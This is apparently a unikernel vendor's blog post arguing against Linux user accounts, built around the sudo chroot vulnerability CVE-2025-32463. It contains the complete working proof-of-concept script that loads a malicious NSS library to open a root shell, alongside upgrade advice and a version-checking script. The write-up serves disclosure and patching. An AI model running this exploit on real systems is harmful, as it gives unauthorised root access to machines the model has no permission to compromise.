Why You Shouldn't Have Users or Don't Dare Do What the Sudo Do - CVE-2025-32463

The concept of users is a very outdated concept for system administration now that we live in the age of virtualization and the cloud. A lot of organizations left this paradigm a long time ago regardless. Today it is super common to pop into an EC2 box and immediately be able to `sudo su` your way up to root. No one cares anymore. So it really begs the question: why do we even have users? Why have passwords? Why have shells? None of it makes sense if you are on a fake virtualized computer.

The concept of users traces back to the 60s and 70s, when computers were so large and so expensive they took up an entire wall. It was a business necessity that many users share the same computer. Today it makes zero sense, as a lot of software doesn't even fit on a single machine anymore.

A large chunk of developers don't even interact 1:1 with Linux systems anymore. They are using serverless offerings or platform-as-a-service products. Obviously serverless still means running on someone else's server, and those workloads are still running on top of Linux, but the developers aren't interacting with it.

Another change over the past 10-15 years is that observability software went through a Cambrian explosion at roughly the same time that ZIRP accelerated the accumulation of software being deployed to prod. Even if people wanted to manage individual systems one by one, it simply doesn't make sense to do so anymore.

Now that unikernels exist, you don't need to deploy your production software with these outdated concepts. Nanos unikernels don't have 'sudo'. They don't have users. They don't have passwords. They don't have shells. They don't have ssh. They don't have the capability of running other programs on the same system as the one that is already running.

Instead of virtualizing the operating system, unikernels essentially virtualize your application.

CVE-2025-32463 - A Change to Root

CVE-2025-32463 was announced today by Stratascale, the cybersecurity division of SHI. It is an insanely straightforward way to escalate from an ordinary user to root on Ubuntu. The root (heh!) of the problem is sudo's -R/--chroot option: sudo chroots into a directory supplied by the invoking user while it resolves the command, and it does so regardless of whatever the sudoers file states, even for a user with no chroot rule at all. While chrooted it reads /etc/nsswitch.conf from that attacker-controlled directory, so the attacker chooses which NSS shared library the root-privileged sudo process loads, which is arbitrary code execution as root.

```bash
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)

# Staging directory under /tmp; everything below lives here and is
# removed at the end. chroot() does not change the working directory,
# so files in $STAGE stay reachable via relative paths after sudo chroots.
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

# Payload: a shared object whose constructor runs the moment it is loaded.
# sudo loads it while still running as root, so the constructor simply
# pins uid/gid 0 and execs a root shell.
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

# Fake root directory "woot". Its nsswitch.conf names the passwd service
# "/woot1337"; glibc builds the NSS library name as libnss_<service>.so.2,
# i.e. "libnss_/woot1337.so.2", and the embedded slash makes that a path
# relative to the current directory ($STAGE) rather than a library search.
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
# -R woot chroots sudo into the fake root before the command is resolved.
# The command "woot" never needs to exist: the user lookup triggers the
# NSS load, and the library constructor fires first.
sudo -R woot woot
rm -rf ${STAGE?}
```

There is no workaround for this. The fix is to upgrade: the affected releases are sudo 1.9.14 through 1.9.17, and 1.9.17p1 (or your distribution's patched package) closes the hole. If you're on an affected system, update.
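As an added example (not from the original post, Stratascale, or the sudo project), a small POSIX sh check that parses the banner from `sudo -V` and reports whether the version falls in the affected window. The version bounds are taken from the published advisory (1.9.14 through 1.9.17 affected, 1.9.17p1 fixed); the banner format "Sudo version X.Y.ZpN" is the one the sudo binary prints.

```shell
#!/bin/sh
# Added example: is this sudo build in the CVE-2025-32463 affected range?
# Assumed bounds from the advisory: 1.9.14 .. 1.9.17 vulnerable, 1.9.17p1+ fixed.

# Map "1.9.17p1" to a sortable integer:
#   major*1000000 + minor*10000 + patch*100 + p-level
# so that 1.9.17p1 sorts strictly above 1.9.17 and below 1.9.18.
sudo_version_key() {
    ver=$1
    base=${ver%%p*}                     # "1.9.17p1" -> "1.9.17"
    plevel=0
    case "$ver" in
        *p*) plevel=${ver##*p} ;;       # "1.9.17p1" -> "1"
    esac
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}
    patch=${rest#*.}
    [ "$patch" = "$rest" ] && patch=0   # "1.9" has no third component
    echo $(( major * 1000000 + minor * 10000 + patch * 100 + plevel ))
}

# Exit status 0 ("true") when the version is inside the affected window.
sudo_version_vulnerable() {
    key=$(sudo_version_key "$1")
    lo=$(sudo_version_key 1.9.14)
    hi=$(sudo_version_key 1.9.17)       # 1.9.17p1 is above this, so it passes
    [ "$key" -ge "$lo" ] && [ "$key" -le "$hi" ]
}

# Pull "1.9.15p5" out of the first line of `sudo -V` output
# ("Sudo version 1.9.15p5"). Takes the text as an argument so it can be
# exercised without sudo installed.
sudo_version_from_banner() {
    printf '%s\n' "$1" | sed -n '1s/^Sudo version \([0-9][0-9.]*p\{0,1\}[0-9]*\).*/\1/p'
}

# Check the sudo on this host. Returns 1 if affected, 0 if not, 2 if no sudo.
check_installed_sudo() {
    banner=$(sudo -V 2>/dev/null) || { echo "sudo not found"; return 2; }
    ver=$(sudo_version_from_banner "$banner")
    if sudo_version_vulnerable "$ver"; then
        echo "sudo $ver: in the CVE-2025-32463 affected range, upgrade to 1.9.17p1 or later"
        return 1
    fi
    echo "sudo $ver: not in the affected range"
    return 0
}

# Run the live check only when asked: sh sudo-version-check.sh --check
case "${1:-}" in
    --check) check_installed_sudo ;;
esac
```

One caveat for the live check: distributions such as Ubuntu and Debian backport the fix without bumping the upstream version string, so a package that reports 1.9.15p5 may already be patched. Treat a hit from this script as "go read the distro security advisory and package changelog", not as proof of exploitability; the PoC above is the definitive test on a box you are allowed to break.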

If you think you need users, we'd challenge you to re-assess and ask yourself whether you really need them or you're just used to them. If it's the latter, stop scrambling to patch your systems constantly. Deploy unikernels and be done with it.
